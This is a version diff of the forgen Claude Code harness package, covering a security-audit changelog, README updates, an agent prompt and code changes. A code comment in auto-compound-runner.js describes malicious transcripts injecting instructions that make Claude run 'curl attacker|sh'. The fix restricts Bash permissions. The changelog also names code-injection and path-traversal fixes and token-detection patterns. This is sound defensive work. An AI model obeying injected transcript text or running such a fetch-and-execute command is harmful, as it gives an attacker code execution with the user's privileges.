@wooojin/forgen 0.3.0 → 0.3.2

package/.claude-plugin/plugin.json

@@ -1,7 +1,7 @@
 {
   "$schema": "https://claude.ai/schemas/claude-plugin.json",
   "name": "forgen",
-  "version": "5.1.2",
+  "version": "0.3.2",
   "description": "Claude Code harness — the more you use Claude, the better it gets",
   "author": {
     "name": "jang-ujin",
@@ -10,7 +10,12 @@
   "repository": "https://github.com/wooo-jin/forgen",
   "homepage": "https://github.com/wooo-jin/forgen",
   "license": "MIT",
-  "keywords": ["claude-code", "harness", "personalization", "forge"],
+  "keywords": [
+    "claude-code",
+    "harness",
+    "personalization",
+    "forge"
+  ],
   "skills": "./skills/",
   "agents": "agents/",
   "statusLine": {

package/CHANGELOG.md

@@ -5,6 +5,138 @@ All notable changes to forgen will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [0.3.2] - 2026-04-21
+
+### Security — Audit findings landed
+
+Independent read-only audit (docs/claude-audit-brief.md) surfaced 10 structural
+issues plus 2 follow-up findings. All 12 are fixed with invariant tests.
+
+**P0 — data loss / code injection**
+- **Settings parse-failure data loss** (#2, #10): `settings-injector.ts` and
+  `scripts/postinstall.js` no longer silently replace a malformed settings.json
+  with `{}`. New `readSettingsSafely()` preserves the corrupt original to
+  `settings.json.corrupt-<ts>` and throws; writers release the lock and abort.
+  postinstall settings + `~/.claude.json` now use tmp-file + rename atomic write.
+- **Code injection via node -e** (#5): `session-recovery.ts` no longer
+  interpolates a user-supplied sessionId into a `-e` template literal. A
+  dedicated runner at `dist/hooks/internal/run-lifecycle-check.js` reads the id
+  from argv — no shell, no eval surface.
+- **solution-outcomes race** (#9): all pending-state mutations are now serialised
+  under `withFileLockSync` + `atomicWriteJSON`. Concurrent inject / correction /
+  error hooks on the same session no longer lose or duplicate events.
+- **Archive path traversal** (follow-up #A): `compound-export.importKnowledge`
+  rejects entries whose resolved destination sits outside ME_DIR, including
+  sibling-directory prefix collisions (e.g. `../me-evil/…`).
+
+**P1 — lock semantics, trust, uninstall, injection precision**
+- **Settings-lock live-holder handling** (#1): acquireLock now throws
+  `SettingsLockError` on live-PID timeout instead of overwriting the lock;
+  releaseLock verifies ownership before deleting.
+- **Trust silent escalation** (#3): `preset-manager.computeEffectiveTrust`
+  returns a `Trust 상승` warning when runtime is more permissive than desired;
+  harness surfaces it to the user; fgx cautions `가드레일 우선`/`승인 완화`
+  profile users.
+- **Install/uninstall symmetry** (#7): `uninstall` now strips `FORGEN_*` env
+  keys (previously only `COMPOUND_*`) and recognises `forgen me` (previously
+  only `forgen status`) as the forgen-owned statusLine.
+- **Legacy profile guard** (#6): `loadProfile` runs `isV1Profile` and returns
+  null on legacy shapes so bootstrap re-runs cutover instead of typing stale
+  JSON as v1.
+- **secret-filter vendor tokens** (follow-up #B): GitHub PATs (ghp_/gho_/
+  ghs_/ghu_/ghr_), Google API keys (AIza…), and Slack tokens (xox[abpors]-…)
+  are now detected.
+
+**P2 — label truth, transcript attribution**
+- **permission-handler labels** (#4): `approve()`/`approveWithWarning()` never
+  set `permissionDecision: 'allow'`; they are pass-through. Log and API labels
+  renamed to `safe-pass-through` / `autopilot-warn-pass-through` /
+  `autopilot-pass-through` / `pass-through` so audit trails match reality.
+- **Transcript per-session attribution** (#8): `spawn.ts` snapshots existing
+  transcripts before launching claude and diffs after exit; concurrent sessions
+  in the same cwd no longer cross-attribute. Transcript reading switched to
+  streaming (`createReadStream` + `readline`).
+
+### Added — Data hygiene
+
+Field audit on a ~2-week-old install found 10,802 files in `~/.forgen/state/`
+across 12 filename prefixes, 4.3 MB `match-eval-log.jsonl`, and 80% of
+error-attribution events concentrated on 3 solutions injected at relevance
+0.15–0.21.
+
+- `forgen doctor --prune-state` (new `src/core/state-gc.ts`): removes session-
+  scoped files older than 7 days (checkpoint-, injection-cache-, modified-
+  files-, outcome-pending-, permissions-, skill-trigger-, tool-state-,
+  reminder-, context-, last-). Aggregate jsonl logs are preserved.
+- `solution-outcomes.attributeError` gates: match_score ≥ 0.3,
+  injection-lag ≤ 5 min, top-3 by relevance. Prevents blanket blaming of
+  every injected solution when a tool fails.
+- `solution-injector.MIN_INJECT_RELEVANCE = 0.3` + multi-tag precision gate
+  (`matchedIdentifiers ≥ 1 OR matchedTags ≥ 2`): the matcher remains
+  permissive for recall@5; only the injection step enforces the stricter
+  gate. Zero single-tag high-score injections observed in the field corpus
+  after landing.
+- `match-eval-log.jsonl` size-based rotation at 10 MB (one generation
+  retained).
+
+### Fixed — e2e test isolation
+
+Docker-spawned hooks in `tests/e2e/*.test.ts` were writing session state
+(`e2e-tool-chain`, `chain5-test`, etc.) into the developer's real
+`~/.forgen/state/`. Each e2e file now allocates a fresh `mkdtempSync` HOME
+and injects it into the spawn env; `afterAll` cleans up. Likewise
+`tests/hook-response-tracking.test.ts` now mocks `node:os` so the tracking
+log never lands outside `/tmp/`.
+
+### Fixed — Stale Docker verify checks
+
+`tests/e2e/docker/verify.sh` was asserting three skills that were deleted in
+commit f534227 (v0.3 quality refactor). Result goes from 62/4/6 to 63/0/6
+without touching runtime code.
+
+### Notes
+
+- All fixes confirmed via invariant tests (1732/1732 pass across 143 files),
+  7 real-world attack scenarios (injection, concurrent mutation, corrupt
+  settings, path traversal, prune, doctor smoke), and Linux-clean-environment
+  Docker verification.
+- Upgrade path from 0.3.1 verified (profile + solutions + non-forgen settings
+  byte-identical after upgrade).
+- Windows code paths exist but runtime validation is deferred to GH Actions
+  Windows runner — see P-D note in release audit.
+
+## [0.3.1] - 2026-04-16
+
+### Added — Self-Evolving Harness (inspired by Stanford meta-harness)
+
+Three-phase evolution loop around the existing compound solution store:
+
+**Phase 1 — Fitness Loop (Select axis):**
+- `solution-outcomes`: per-session inject→outcome event log (accept/correct/error/unknown) with fail-open semantics; attribution through solution-injector (appendPending/flushAccept), correction-record MCP (attributeCorrection), and post-tool-failure hook (attributeError).
+- `solution-fitness`: Laplace-smoothed acceptance ratio × log(1+injected) confidence. State classification: draft / active / champion / underperform. No auto-delete — population-relative thresholds only.
+- `solution-quarantine`: malformed frontmatter no longer silently dropped — invalid files surface in `~/.forgen/state/solution-quarantine.jsonl` with actionable diagnostics; `listQuarantined` / `pruneQuarantine` helpers.
+- `solution-fixup`: schema migration for legacy defects (missing `extractedBy`, missing `evidence` block, missing `supersedes`). Applied to the live install, this recovered 5 dead solutions and one was injected on the next matching prompt.
+
+**Phase 4 — Self-Evolution (Propose + Select axes):**
+- `solution-weakness`: structured discovery report from four detectors — under-served tags (correction evidence without a matching champion), conflict clusters, dead corners (injected=0 with unique tags), volatile solutions (accept-rate shift >0.3).
+- `ch-solution-evolver` agent: Opus proposer, Bash-disabled, emits exactly 3 novel candidates into `~/.forgen/lab/candidates/` with 30%-80% tag overlap gate and self-critique novelty check.
+- Candidate cold-start bonus: solutions with `status: candidate` get confidence × 1.3 so they reach enough injections to accumulate fitness. Auto-promotes to `verified` at 5 injections; bonus disappears naturally.
+- Candidate lifecycle: `promoteCandidate` validates schema + refuses name collisions before moving files from lab to `me/solutions`. `rollbackSince` archives every `source: evolved` solution newer than a cutoff to `~/.forgen/lab/archived/rollback-{ts}/` (never deletes — always recoverable).
+
+**CLI surface:**
+- `forgen learn fix-up [--apply]` — dry-run repair of malformed solutions.
+- `forgen learn quarantine [--prune]` — show / clean dropped solutions.
+- `forgen learn fitness [--json]` — per-solution fitness table.
+- `forgen learn evolve [--save]` — weakness report + proposer hint.
+- `forgen learn evolve --promote --list` / `--promote <name>` — candidate promotion.
+- `forgen learn evolve --rollback <epoch-ms-or-ISO>` — time-bounded rollback.
+- Dashboard gains a 🎯 Solution Fitness panel (state distribution + top-3).
+
+**Dogfood evidence:** the full pipeline was exercised end-to-end — weakness report → evolver-agent proposal → schema validation → promotion → cold-start-boosted match (relevance 0.78) → injection counter increment.
+
+### Documentation
+- `docs/design-solution-evolution.md` — Phase 4 design spec with open questions, prerequisites, and rollout plan.
+
 ## [0.3.0] - 2026-04-15
 
 ### BREAKING

package/README.ja.md

@@ -131,6 +131,35 @@ forgen
 - **Node.js** >= 20（SQLite セッション検索には >= 22 を推奨）
 - **Claude Code** インストール・認証済み（`npm i -g @anthropic-ai/claude-code`）
 
+> **ベンダー依存:** forgen は Claude Code をラップします。Anthropic API または Claude Code の変更が動作に影響する可能性があります。Claude Code 1.0.x でテスト済みです。
+
+---
+
+## なぜ forgen か
+
+|                        | Generic Claude Code | oh-my-claudecode | forgen          |
+|------------------------|:-------------------:|:----------------:|:---------------:|
+| 全員に同じ             | Yes                 | Yes              | **No**          |
+| 修正から学習           | No                  | No               | **Yes**         |
+| エビデンスベースのライフサイクル| No          | No               | **Yes**         |
+| 悪いパターンを自動リタイア| No              | No               | **Yes**         |
+| パーソナライズされたルール| No               | No               | **Yes**         |
+| ランタイム依存関係     | -                   | many             | **3**           |
+
+### forgen が向いているケース
+
+**向いている場合:**
+- 数週間かけて Claude があなたのパターンを学習する長期プロジェクト
+- AI の振る舞いに強いこだわりがある開発者
+- Compound 知識の恩恵を受ける繰り返しパターンがあるコードベース
+
+**向いていない場合:**
+- 使い捨てのスクリプトや一時的なプロトタイプ
+- Claude Code がない環境
+- すべてのメンバーに同じ AI 動作が必要なチーム（forgen は個人用であり、チーム向けではありません）
+
+**forgen + oh-my-claudecode:** 一緒に使えます。OMC はオーケストレーション（エージェント、ワークフロー）を、forgen はパーソナライゼーション（プロファイル、学習）を担当します。[共存ガイド](docs/guides/with-omc.md) を参照してください。
+
 ---
 
 ## 仕組み

package/README.ko.md

@@ -131,6 +131,35 @@ forgen
 - **Node.js** >= 20 (SQLite 세션 검색은 >= 22 권장)
 - **Claude Code** 설치 및 인증 (`npm i -g @anthropic-ai/claude-code`)
 
+> **벤더 의존성:** forgen은 Claude Code를 래핑합니다. Anthropic API 또는 Claude Code 변경이 동작에 영향을 줄 수 있습니다. Claude Code 1.0.x 기준으로 테스트되었습니다.
+
+---
+
+## 왜 forgen인가
+
+|                        | Generic Claude Code | oh-my-claudecode | forgen          |
+|------------------------|:-------------------:|:----------------:|:---------------:|
+| 모두에게 동일           | Yes                 | Yes              | **No**          |
+| 교정에서 학습           | No                  | No               | **Yes**         |
+| Evidence 기반 라이프사이클| No               | No               | **Yes**         |
+| 나쁜 패턴 자동 은퇴      | No                  | No               | **Yes**         |
+| 개인화된 규칙           | No                  | No               | **Yes**         |
+| 런타임 의존성           | -                   | many             | **3**           |
+
+### 언제 사용하면 좋은가
+
+**잘 맞는 경우:**
+- 몇 주에 걸쳐 Claude가 패턴을 학습하는 장기 프로젝트
+- AI 행동 방식에 강한 선호가 있는 개발자
+- Compound 지식의 혜택을 받는 반복 패턴이 있는 코드베이스
+
+**맞지 않는 경우:**
+- 일회성 스크립트나 임시 프로토타입
+- Claude Code가 없는 환경
+- 모든 구성원이 동일한 AI 행동이 필요한 팀 (forgen은 개인용이지, 팀용이 아님)
+
+**forgen + oh-my-claudecode:** 함께 사용할 수 있습니다. OMC는 오케스트레이션(에이전트, 워크플로우)을, forgen은 개인화(프로필, 학습)를 담당합니다. [공존 가이드](docs/guides/with-omc.md)를 참고하세요.
+
 ---
 
 ## 동작 방식

package/README.md

@@ -109,7 +109,7 @@ Facets are micro-adjusted based on accumulated evidence. If your corrections con
 
 ### Next session
 
-Updated rules are rendered with your corrections included. Compound knowledge is searchable via MCP. Claude gets better at being *your* Claude.
+Updated rules are rendered with your corrections included. Compound knowledge is searchable via MCP. Retrieval precision grows as your personal accumulation grows — the mechanism is in place from day 1 (starter-pack covers common dev queries on a fresh install), and the signal-to-noise ratio improves over roughly 2–4 weeks of real use as low-fitness solutions are auto-demoted and your specific patterns get promoted.
 
 ---
 
@@ -131,6 +131,35 @@ forgen
 - **Node.js** >= 20 (>= 22 recommended for SQLite session search)
 - **Claude Code** installed and authenticated (`npm i -g @anthropic-ai/claude-code`)
 
+> **Vendor dependency:** Forgen wraps Claude Code. Anthropic API or Claude Code changes may affect behavior. Tested with Claude Code 1.0.x.
+
+---
+
+## Why forgen
+
+|                        | Generic Claude Code | oh-my-claudecode | forgen          |
+|------------------------|:-------------------:|:----------------:|:---------------:|
+| Same for everyone      | Yes                 | Yes              | **No**          |
+| Learns from corrections| No                  | No               | **Yes**         |
+| Evidence-based lifecycle| No                 | No               | **Yes**         |
+| Auto-retires bad patterns| No               | No               | **Yes**         |
+| Personalized rules     | No                  | No               | **Yes**         |
+| Runtime dependencies   | -                   | many             | **3**           |
+
+### When to use forgen
+
+**Good fit:**
+- Long-running projects where Claude learns your patterns over weeks
+- Developers with strong preferences about how AI should behave
+- Codebases with recurring patterns that benefit from compound knowledge
+
+**Not a fit:**
+- One-off scripts or throwaway prototypes
+- Environments without Claude Code
+- Teams that need identical AI behavior for all members (forgen is personal, not team-wide)
+
+**forgen + oh-my-claudecode:** They work together. OMC provides orchestration (agents, workflows); forgen provides personalization (profile, learning). See [Coexistence Guide](docs/guides/with-omc.md).
+
 ---
 
 ## How It Works
@@ -209,12 +238,16 @@ solution-injector matches: starter-error-handling-patterns (0.70)
 Claude sees: "Matched solutions: error-handling-patterns [pattern|0.70]
              Use try/catch with specific error types. Always log original error..."
                     ↓
-Claude writes better error handling code, informed by your accumulated patterns.
+Claude has your accumulated patterns in context while drafting the response.
 ```
 
+Precision gates (v0.3.2+): matches below relevance 0.3 or with only a single
+common-word tag overlap are filtered before injection so Claude's context
+doesn't get polluted by low-signal hits.
+
 ### 10 built-in skills
 
-Curated, compound-native skills. Each one integrates with accumulated knowledge — they get better every session.
+Curated, compound-native skills. Each integrates with your accumulated knowledge — effectiveness compounds as your personal solution base grows.
 
 **Core chain** (build → learn):
 

package/README.zh.md

@@ -131,6 +131,35 @@ forgen
 - **Node.js** >= 20（SQLite 会话搜索推荐 >= 22）
 - **Claude Code** 已安装并认证（`npm i -g @anthropic-ai/claude-code`）
 
+> **厂商依赖:** forgen 封装了 Claude Code。Anthropic API 或 Claude Code 的变更可能影响其行为。已在 Claude Code 1.0.x 版本下测试。
+
+---
+
+## 为什么选择 forgen
+
+|                        | Generic Claude Code | oh-my-claudecode | forgen          |
+|------------------------|:-------------------:|:----------------:|:---------------:|
+| 对所有人相同           | Yes                 | Yes              | **No**          |
+| 从纠正中学习           | No                  | No               | **Yes**         |
+| 基于证据的生命周期     | No                  | No               | **Yes**         |
+| 自动淘汰不良模式       | No                  | No               | **Yes**         |
+| 个性化规则             | No                  | No               | **Yes**         |
+| 运行时依赖             | -                   | many             | **3**           |
+
+### 适用场景
+
+**适合使用:**
+- Claude 可以在数周内学习你的模式的长期项目
+- 对 AI 行为方式有强烈偏好的开发者
+- 有重复模式、能从 Compound 知识中获益的代码库
+
+**不适合使用:**
+- 一次性脚本或临时原型
+- 没有 Claude Code 的环境
+- 需要所有成员 AI 行为完全一致的团队（forgen 是个人化的，不面向团队）
+
+**forgen + oh-my-claudecode:** 可以一起使用。OMC 负责编排（智能体、工作流）; forgen 负责个性化（档案、学习）。详情请参阅 [共存指南](docs/guides/with-omc.md)。
+
 ---
 
 ## 工作原理

package/agents/solution-evolver.md

@@ -0,0 +1,115 @@
+---
+name: ch-solution-evolver
+description: Propose 3 novel compound-solution candidates from a weakness report (Phase 4 evolution loop)
+model: opus
+maxTurns: 10
+color: cyan
+disallowedTools:
+  - Bash
+---
+
+<!-- forgen-managed -->
+
+<Agent_Prompt>
+
+# Solution Evolver — compound-solution 후보 제안자
+
+"기존에 통한 패턴은 보존한다. 부족한 영역만 새 패턴을 심는다."
+
+당신은 forgen 하네스의 **진화 엔진**입니다. 입력으로 주어진 weakness report를 읽고, **정확히 3개**의 compound-solution 후보를 제안합니다.
+
+<Success_Criteria>
+- 정확히 3개 후보를 제안 (더 적거나 많으면 실패)
+- 각 후보는 weakness report의 under-served tags 또는 conflict cluster 중 하나를 타깃
+- 각 후보는 기존 champion과 **tag overlap 30~80%** — 완전 중복도 완전 무관도 거부
+- 본문 길이 ≤ 1200 chars (토큰 비용 제약)
+- 각 후보에 "왜 novel한가"를 한 줄로 기재
+</Success_Criteria>
+
+<Failure_Modes_To_Avoid>
+- 파라미터만 다른 변형 (예: "TDD를 더 엄격히" — 진짜 novel이 아님)
+- 같은 이름 재사용 (collision 유발)
+- 기존 champion을 직접 수정 제안 (stable한 건 건드리지 않음)
+- 도메인 specific 하드코딩 (예: "forgen 코드 베이스 전용" → 일반화 불가)
+- dataset/언어 specific (예: "Python에서만" — 범용성 훼손)
+</Failure_Modes_To_Avoid>
+
+## 입력 형식
+
+호출자가 아래를 제공합니다:
+
+1. **Weakness Report** JSON (`~/.forgen/state/weakness-report-{ts}.json`)
+   - `under_served_tags`: correction은 많은데 champion이 없는 태그
+   - `conflict_clusters`: 같은 태그에서 champion/underperform 공존 영역
+   - `dead_corners`: 아예 매칭 안 되는 고립 태그
+2. **기존 champion 솔루션** 상위 5개 (참고 맥락)
+
+## 출력 형식
+
+각 후보를 **파일로 직접 작성**합니다. 대상 디렉토리: `~/.forgen/lab/candidates/`.
+파일명은 `evolved-{slug}.md` 형식 (slug는 후보 이름에서 영문 소문자 + 하이픈만).
+이 디렉토리는 격리된 qurantine 영역으로, 여기 쓴 파일은 매칭에 바로 참여하지 **않습니다**.
+사용자가 `forgen learn evolve --promote <name>` 을 실행해야 `me/solutions/`로 이동합니다.
+
+파일 구조:
+
+```markdown
+### Candidate 1: {slug}
+novelty: {한 줄 설명 — 왜 기존과 다른가}
+target_weakness: {under_served_tag | conflict_cluster | dead_corner}
+target_detail: {구체적 약점 레퍼런스}
+
+---
+name: evolved-{slug}
+version: 1
+status: candidate
+confidence: 0.6
+type: pattern
+scope: me
+tags:
+  - {tag1}
+  - {tag2}
+  - ...
+identifiers: []
+created: "YYYY-MM-DD"
+updated: "YYYY-MM-DD"
+supersedes: null
+extractedBy: auto
+source: evolved
+evidence:
+  injected: 0
+  reflected: 0
+  negative: 0
+  sessions: 0
+  reExtracted: 0
+---
+
+## Context
+{한두 문장: 언제 이 패턴을 적용하는가}
+
+## Rule
+{핵심 규칙 1~2개, 짧게}
+
+## Anti-pattern
+{이것만은 피하라 1개}
+```
+
+### Candidate 2, 3도 동일 형식.
+
+## Workflow
+
+1. **Read weakness report** — 어떤 구멍이 큰지 파악 (correction_mentions, dead_corner 크기 순)
+2. **Read top 5 champions** — 그들의 태그/본문/길이 관찰 (본받을 구조, 중복 피할 영역)
+3. **Select 3 targets** — 각기 다른 weakness에서 1개씩 (under-served 1 + conflict 1 + dead-corner 1 이상적)
+4. **Prototype mentally** — 각 후보의 한 줄 핵심 rule이 기존 champion과 실제로 다른지 self-check
+5. **Emit 3 candidates** — 위 format 준수
+
+## Novelty Gate — Self-critique
+
+제출 전 각 후보에 대해 다음 질문에 답하세요:
+
+- 기존 champion 중 tag overlap 50% 이상인 솔루션이 있다면, 이 후보의 **Rule**이 그 champion의 Rule과 **다른 조언**을 하는가? (Yes가 아니면 탈락)
+- 이 후보가 맞출 weakness 타깃이 report에 명시되어 있는가? (없으면 탈락 — 근거 없는 제안 거부)
+- 본문이 1200자를 초과하는가? (초과면 요약)
+
+</Agent_Prompt>

package/dist/cli.js

@@ -79,6 +79,14 @@ const commands = [
             await handleDashboard();
         },
     },
+    {
+        name: 'learn',
+        description: 'Solution maintenance: fix-up | quarantine | fitness',
+        handler: async (args) => {
+            const { handleLearn } = await import('./engine/learn-cli.js');
+            await handleLearn(args);
+        },
+    },
     {
         name: 'me',
         description: 'Personal dashboard (→ inspect profile)',
@@ -151,10 +159,10 @@ const commands = [
     },
     {
         name: 'doctor',
-        description: 'Diagnostics',
-        handler: async (_args) => {
+        description: 'Diagnostics (--prune-state to GC stale session files)',
+        handler: async (args) => {
             const { runDoctor } = await import('./core/doctor.js');
-            await runDoctor();
+            await runDoctor({ pruneState: args.includes('--prune-state') });
         },
     },
     // install --plugin 제거됨 — postinstall이 유일한 설치 경로

package/dist/core/auto-compound-runner.js

@@ -279,10 +279,13 @@ try {
 ---
 ${sanitizedSummary.slice(0, 6000)}
 ---`;
+    // P1-S1 fix (2026-04-20): 과거에는 `--allowedTools Bash`로 전체 Bash 권한을 줘서
+    // 악성 transcript(공급망 인젝션)가 filter를 우회해 `curl attacker|sh` 같은 명령을
+    // 피해자 권한으로 실행시킬 수 있었다. 이제 `Bash(forgen compound:*)`로 좁혀 Claude
+    // 가 compound 추출용 forgen CLI 호출만 가능하게 한다. filter-bypass 시에도 임의
+    // 명령 실행 차단.
     try {
-        execClaudeRetry(['-p', solutionPrompt, '--allowedTools', 'Bash', '--model', COMPOUND_MODEL], {
-            cwd, timeout: 90_000, stdio: ['pipe', 'ignore', 'pipe'],
-        });
+        execClaudeRetry(['-p', solutionPrompt, '--allowedTools', 'Bash(forgen compound:*)', '--model', COMPOUND_MODEL], { cwd, timeout: 90_000, stdio: ['pipe', 'ignore', 'pipe'] });
     }
     catch (e) {
         process.stderr.write(`[forgen-auto-compound] solution extraction: ${e instanceof Error ? e.message : String(e)}\n`);

package/dist/core/dashboard.js

@@ -13,7 +13,14 @@
  */
 import * as fs from 'node:fs';
 import * as path from 'node:path';
-import { ME_SOLUTIONS, ME_RULES, ME_BEHAVIOR, STATE_DIR, V1_EVIDENCE_DIR, } from './paths.js';
+import { createRequire } from 'node:module';
+// P0-1 fix (2026-04-20): ESM `"type": "module"` 프로젝트에서 `require`가 글로벌에
+// 없어 이전에는 renderFitnessSummary 안의 `require('../engine/solution-fitness.js')`가
+// 항상 ReferenceError로 catch 경로에 떨어져 Solution Fitness 대시보드 섹션이
+// 조용히 무효화됐다 (정상처럼 "아직 outcome 이벤트 데이터 없음" 출력).
+// createRequire로 CJS require를 ESM 환경에 부트스트랩 — session-store.ts 패턴 동일.
+const require = createRequire(import.meta.url);
+import { ME_SOLUTIONS, ME_RULES, ME_BEHAVIOR, STATE_DIR, } from './paths.js';
 import { parseFrontmatterOnly } from '../engine/solution-format.js';
 import { readMatchEvalLog } from '../engine/match-eval-log.js';
 // ── ANSI color helpers ──
@@ -361,11 +368,11 @@ export function collectLearningCurve() {
     const axisCounts = new Map();
     const uniqueDays = new Set();
     try {
-        if (fs.existsSync(V1_EVIDENCE_DIR)) {
-            const files = fs.readdirSync(V1_EVIDENCE_DIR).filter(f => f.endsWith('.json'));
+        if (fs.existsSync(ME_BEHAVIOR)) {
+            const files = fs.readdirSync(ME_BEHAVIOR).filter(f => f.endsWith('.json'));
             for (const f of files) {
                 try {
-                    const data = JSON.parse(fs.readFileSync(path.join(V1_EVIDENCE_DIR, f), 'utf-8'));
+                    const data = JSON.parse(fs.readFileSync(path.join(ME_BEHAVIOR, f), 'utf-8'));
                     if (!data.timestamp)
                         continue;
                     const ts = new Date(data.timestamp).getTime();
@@ -457,6 +464,50 @@ function renderLearningCurve(data) {
         `    ${dim('※ compound가 힌트를 제공한 매 1회당 평균 8분 절약 가정')}`,
     ].join('\n');
 }
+function renderFitnessSummary() {
+    // Lazy import: keep dashboard startup cheap if outcomes are absent.
+    let summary;
+    try {
+        const { computeFitness } = require('../engine/solution-fitness.js');
+        const records = computeFitness();
+        summary = {
+            total: records.length,
+            champion: records.filter((r) => r.state === 'champion').length,
+            active: records.filter((r) => r.state === 'active').length,
+            underperform: records.filter((r) => r.state === 'underperform').length,
+            draft: records.filter((r) => r.state === 'draft').length,
+            top: records.slice(0, 3).map((r) => ({ name: r.solution, fitness: r.fitness, state: r.state })),
+        };
+    }
+    catch {
+        summary = { total: 0, champion: 0, active: 0, underperform: 0, draft: 0, top: [] };
+    }
+    if (summary.total === 0) {
+        return [
+            `  ${bold('🎯 Solution Fitness / 솔루션 적합도')}`,
+            ``,
+            `    ${dim('아직 outcome 이벤트 데이터 없음.')}`,
+            `    ${dim('솔루션 주입이 누적되면 자동으로 채워집니다.')}`,
+        ].join('\n');
+    }
+    const topLines = summary.top.length > 0
+        ? summary.top.map((t) => {
+            const icon = t.state === 'champion' ? green('●') : t.state === 'underperform' ? red('●') : cyan('●');
+            return `    ${icon} ${t.name.slice(0, 44).padEnd(44)} ${t.fitness.toFixed(2)} (${t.state})`;
+        }).join('\n')
+        : `    ${dim('(top 3 없음)')}`;
+    return [
+        `  ${bold('🎯 Solution Fitness / 솔루션 적합도')}`,
+        ``,
+        `  상태 분포 (총 ${summary.total}개):`,
+        `    ${green('champion')}: ${summary.champion}   ${cyan('active')}: ${summary.active}   ${red('underperform')}: ${summary.underperform}   ${dim('draft')}: ${summary.draft}`,
+        ``,
+        `  Top 3 by fitness:`,
+        topLines,
+        ``,
+        `  ${dim('상세: forgen learn fitness')}`,
+    ].join('\n');
+}
 export function renderDashboard() {
     const knowledge = collectKnowledgeOverview();
     const injection = collectInjectionActivity();
@@ -474,6 +525,8 @@ export function renderDashboard() {
         '',
         renderLearningCurve(learning),
         divider,
+        renderFitnessSummary(),
+        divider,
         renderKnowledgeOverview(knowledge),
         divider,
         renderInjectionActivity(injection),

package/dist/core/doctor.d.ts

@@ -1 +1,6 @@
-export declare function runDoctor(): Promise<void>;
+export interface DoctorOptions {
+    /** When true, delete stale session-scoped state files instead of just
+     *  reporting bloat. Triggered by `forgen doctor --prune-state`. */
+    pruneState?: boolean;
+}
+export declare function runDoctor(opts?: DoctorOptions): Promise<void>;

package/dist/core/doctor.js

@@ -4,6 +4,7 @@ import * as path from 'node:path';
 import { execFileSync } from 'node:child_process';
 import { FORGEN_HOME, LAB_DIR, ME_BEHAVIOR, ME_DIR, ME_PHILOSOPHY, ME_SOLUTIONS, ME_RULES, ME_SKILLS, PACKS_DIR, SESSIONS_DIR, STATE_DIR } from './paths.js';
 import { getTimingStats } from '../hooks/shared/hook-timing.js';
+import { countSessionScopedFiles, pruneState } from './state-gc.js';
 /** ~/.claude/projects/ — Claude Code 세션 저장 경로 */
 const CLAUDE_PROJECTS_DIR = path.join(os.homedir(), '.claude', 'projects');
 function check(label, condition, hint) {
@@ -24,7 +25,7 @@ function commandExists(cmd) {
         return false;
     }
 }
-export async function runDoctor() {
+export async function runDoctor(opts = {}) {
     console.log('\n  Forgen — Diagnostics\n');
     console.log('  [Tools]');
     check('claude CLI', commandExists('claude'));
@@ -305,6 +306,25 @@ export async function runDoctor() {
         }
         console.log();
     }
+    // State bloat check — session-scoped files accumulate until pruned.
+    console.log('  [State Hygiene]');
+    const sessionFiles = countSessionScopedFiles();
+    if (sessionFiles === 0) {
+        console.log('  ✓ no session-scoped state files');
+    }
+    else if (sessionFiles < 500) {
+        console.log(`  ✓ ${sessionFiles} session-scoped files (under threshold)`);
+    }
+    else {
+        console.log(`  ⚠ ${sessionFiles} session-scoped files (bloat threshold 500)`);
+        console.log('    Run: forgen doctor --prune-state   (removes files older than 7 days)');
+    }
+    if (opts.pruneState) {
+        const report = pruneState({ dryRun: false });
+        const mb = (report.bytesFreed / 1024 / 1024).toFixed(2);
+        console.log(`  → Pruned ${report.pruned}/${report.scanned} files (${mb} MB freed, >${report.retentionDays}d old)`);
+    }
+    console.log();
     // 현재 디렉토리 git 정보
     console.log('  [Git]');
     try {

package/dist/core/global-config.d.ts

@@ -37,7 +37,7 @@ export interface GlobalConfig {
     /** 레거시 마이그레이션 백업 경로 */
     legacy_backup?: string;
 }
-/** v1 config 로드 (~/.forgen/config.json 우선, 레거시 폴백) */
+/** 글로벌 config 로드 (~/.forgen/config.json) */
 export declare function loadGlobalConfig(): GlobalConfig;
-/** v1 config 저장 (~/.forgen/config.json) */
+/** 글로벌 config 저장 (~/.forgen/config.json) */
 export declare function saveGlobalConfig(config: GlobalConfig): void;